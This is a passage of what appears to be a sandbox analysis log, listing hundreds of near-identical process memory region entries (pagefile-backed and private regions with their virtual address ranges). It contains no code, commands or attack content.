= 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3654 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3655 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3656 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3657 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3658 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3659 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3660 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3661 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3662 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3663 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3664 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3665 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3666 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3667 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3668 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3669 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3670 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3671 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3672 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3673 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3674 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3675 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3676 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3677 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3678 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3679 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3680 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3681 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3682 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3683 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3684 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3685 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3686 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3687 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3688 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3689 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3690 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3691 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3692 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3693 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3694 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3695 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3696 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3697 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3698 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3699 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3700 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3701 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3702 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3703 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3704 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3705 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3706 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3707 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3708 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3709 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3710 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3711 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3712 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3713 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3714 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3715 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3716 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3717 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3718 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3719 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3720 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3721 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3722 start_va = 0x84b1100000 end_va = 0x84b110ffff entry_point = 0x0 region_type = private name = "private_0x00000084b1100000" filename = "" Region: id = 3723 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = private name = "private_0x00000084b1100000" filename = "" Region: id = 3724 start_va = 0x84b2e20000 end_va = 0x84b361ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b2e20000" filename = "" Region: id = 3725 start_va = 0x84b3620000 end_va = 0x84b3e1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b3620000" filename = "" Region: id = 3726 start_va = 0x84b1130000 end_va = 0x84b1154fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1130000" filename = "" Region: id = 3727 start_va = 0x84b1100000 end_va = 0x84b1124fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3728 start_va = 0x84b1100000 end_va = 0x84b1124fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3729 start_va = 0x84b1100000 end_va = 0x84b1124fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3730 start_va = 0x84b1100000 end_va = 0x84b1124fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3731 start_va = 0x84b1100000 end_va = 0x84b1124fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3732 start_va = 0x84b1100000 end_va = 0x84b1124fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3733 start_va = 0x84b1100000 end_va = 0x84b1124fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3734 start_va = 0x84b1100000 end_va = 0x84b1124fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3735 start_va = 0x84b1100000 end_va = 0x84b1124fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3736 start_va = 0x84b1100000 end_va = 0x84b1124fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3737 start_va = 0x84b1100000 end_va = 0x84b1124fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3738 start_va = 0x84b1100000 end_va = 0x84b1124fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3739 start_va = 0x84b1100000 end_va = 0x84b1124fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3740 start_va = 0x84b1100000 end_va = 0x84b1124fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3750 start_va = 0x84b1100000 end_va = 0x84b1124fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3751 start_va = 0x84b1100000 end_va = 0x84b1124fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3752 start_va = 0x84b1100000 end_va = 0x84b1124fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3753 start_va = 0x84b1100000 end_va = 0x84b1124fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3754 start_va = 0x84b1100000 end_va = 0x84b1124fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3755 start_va = 0x84b1100000 end_va = 0x84b1124fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3756 start_va = 0x84b1100000 end_va = 0x84b1124fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3757 start_va = 0x84b1100000 end_va = 0x84b1124fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3758 start_va = 0x84b1100000 end_va = 0x84b1124fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3759 start_va = 0x84b1100000 end_va = 0x84b1124fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3760 start_va = 0x84b1100000 end_va = 0x84b1124fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3761 start_va = 0x84b1100000 end_va = 0x84b1124fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3762 start_va = 0x84b1100000 end_va = 0x84b1124fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3763 start_va = 0x84b1100000 end_va = 0x84b1124fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3764 start_va = 0x84b1100000 end_va = 0x84b1124fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3765 start_va = 0x84b1100000 end_va = 0x84b1124fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3766 start_va = 0x84b1100000 end_va = 0x84b1124fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3767 start_va = 0x84b1100000 end_va = 0x84b1124fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3768 start_va = 0x84b1100000 end_va = 0x84b1124fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3769 start_va = 0x84b1100000 end_va = 0x84b1124fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3770 start_va = 0x84b1100000 end_va = 0x84b1124fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3771 start_va = 0x84b1100000 end_va = 0x84b1124fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3772 start_va = 0x84b1100000 end_va = 0x84b1124fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3773 start_va = 0x84b1100000 end_va = 0x84b1124fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3774 start_va = 0x84b1100000 end_va = 0x84b1124fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3775 start_va = 0x84b1100000 end_va = 0x84b1124fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3776 start_va = 0x84b1100000 end_va = 0x84b1124fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3777 start_va = 0x84b1100000 end_va = 0x84b1124fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3778 start_va = 0x84b1100000 end_va = 0x84b1124fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3779 start_va = 0x84b1100000 end_va = 0x84b1124fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3780 start_va = 0x84b1100000 end_va = 0x84b1124fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3781 start_va = 0x84b1100000 end_va = 0x84b1124fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3782 start_va = 0x84b1100000 end_va = 0x84b1124fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3783 start_va = 0x84b1100000 end_va = 0x84b1124fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3784 start_va = 0x84b1100000 end_va = 0x84b1124fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3785 start_va = 0x84b1100000 end_va = 0x84b1124fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3786 start_va = 0x84b1100000 end_va = 0x84b1124fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3787 start_va = 0x84b1100000 end_va = 0x84b1124fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3788 start_va = 0x84b1100000 end_va = 0x84b1124fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3789 start_va = 0x84b1100000 end_va = 0x84b1124fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3790 start_va = 0x84b1100000 end_va = 0x84b1124fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3791 start_va = 0x84b1100000 end_va = 0x84b1124fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3792 start_va = 0x84b1100000 end_va = 0x84b1124fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3793 start_va = 0x84b1100000 end_va = 0x84b1124fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3794 start_va = 0x84b1100000 end_va = 0x84b1124fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3795 start_va = 0x84b1100000 end_va = 0x84b1124fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3796 start_va = 0x84b1100000 end_va = 0x84b1124fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3797 start_va = 0x84b1100000 end_va = 0x84b1124fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3798 start_va = 0x84b1100000 end_va = 0x84b1124fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3799 start_va = 0x84b1100000 end_va = 0x84b1124fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3800 start_va = 0x84b1100000 end_va = 0x84b1124fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3801 start_va = 0x84b1100000 end_va = 0x84b1124fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3802 start_va = 0x84b1100000 end_va = 0x84b1124fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3803 start_va = 0x84b1100000 end_va = 0x84b1124fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3804 start_va = 0x84b1100000 end_va = 0x84b1124fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3805 start_va = 0x84b1100000 end_va = 0x84b1124fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3806 start_va = 0x84b1100000 end_va = 0x84b1124fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3807 start_va = 0x84b1100000 end_va = 0x84b1124fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3808 start_va = 0x84b1100000 end_va = 0x84b1124fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3809 start_va = 0x84b1100000 end_va = 0x84b1124fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3810 start_va = 0x84b1100000 end_va = 0x84b1124fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3811 start_va = 0x84b1100000 end_va = 0x84b1124fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3812 start_va = 0x84b1100000 end_va = 0x84b1124fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3813 start_va = 0x84b1100000 end_va = 0x84b1124fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3814 start_va = 0x84b1100000 end_va = 0x84b1124fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3815 start_va = 0x84b1100000 end_va = 0x84b1124fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3816 start_va = 0x84b1100000 end_va = 0x84b1124fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3817 start_va = 0x84b1100000 end_va = 0x84b1124fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3818 start_va = 0x84b1100000 end_va = 0x84b1124fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3819 start_va = 0x84b1100000 end_va = 0x84b1124fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3820 start_va = 0x84b1100000 end_va = 0x84b1124fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3821 start_va = 0x84b1100000 end_va = 0x84b1124fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3822 start_va = 0x84b1100000 end_va = 0x84b1124fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3823 start_va = 0x84b1100000 end_va = 0x84b1124fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3824 start_va = 0x84b1100000 end_va = 0x84b1124fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3825 start_va = 0x84b1100000 end_va = 0x84b1124fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3826 start_va = 0x84b1100000 end_va = 0x84b1124fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3827 start_va = 0x84b1100000 end_va = 0x84b1124fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3828 start_va = 0x84b1100000 end_va = 0x84b1124fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3829 start_va = 0x84b1100000 end_va = 0x84b1124fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3830 start_va = 0x84b1100000 end_va = 0x84b1124fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3831 start_va = 0x84b1100000 end_va = 0x84b1124fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3832 start_va = 0x84b1100000 end_va = 0x84b1124fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3833 start_va = 0x84b1100000 end_va = 0x84b1124fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3834 start_va = 0x84b1100000 end_va = 0x84b1124fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3835 start_va = 0x84b1100000 end_va = 0x84b1124fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3836 start_va = 0x84b1100000 end_va = 0x84b1124fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3837 start_va = 0x84b1100000 end_va = 0x84b1124fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3838 start_va = 0x84b1100000 end_va = 0x84b1124fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3839 start_va = 0x84b1100000 end_va = 0x84b1124fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3852 start_va = 0x84b1100000 end_va = 0x84b1124fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3854 start_va = 0x84b1100000 end_va = 0x84b110ffff entry_point = 0x0 region_type = private name = "private_0x00000084b1100000" filename = "" Region: id = 3855 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = private name = "private_0x00000084b1100000" filename = "" Region: id = 3856 start_va = 0x84b2e20000 end_va = 0x84b361ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b2e20000" filename = "" Region: id = 3857 start_va = 0x84b3620000 end_va = 0x84b3e1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b3620000" filename = "" Region: id = 3858 start_va = 0x84b1130000 end_va = 0x84b1155fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1130000" filename = "" Region: id = 3859 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3885 start_va = 0x84b1100000 end_va = 0x84b110ffff entry_point = 0x0 region_type = private name = "private_0x00000084b1100000" filename = "" Region: id = 3886 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = private name = "private_0x00000084b1100000" filename = "" Region: id = 3887 start_va = 0x84b2e20000 end_va = 0x84b361ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b2e20000" filename = "" Region: id = 3888 start_va = 0x84b3620000 end_va = 0x84b3e1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b3620000" filename = "" Region: id = 3889 start_va = 0x84b1130000 end_va = 0x84b1155fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1130000" filename = "" Region: id = 3893 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = pagefile_backed 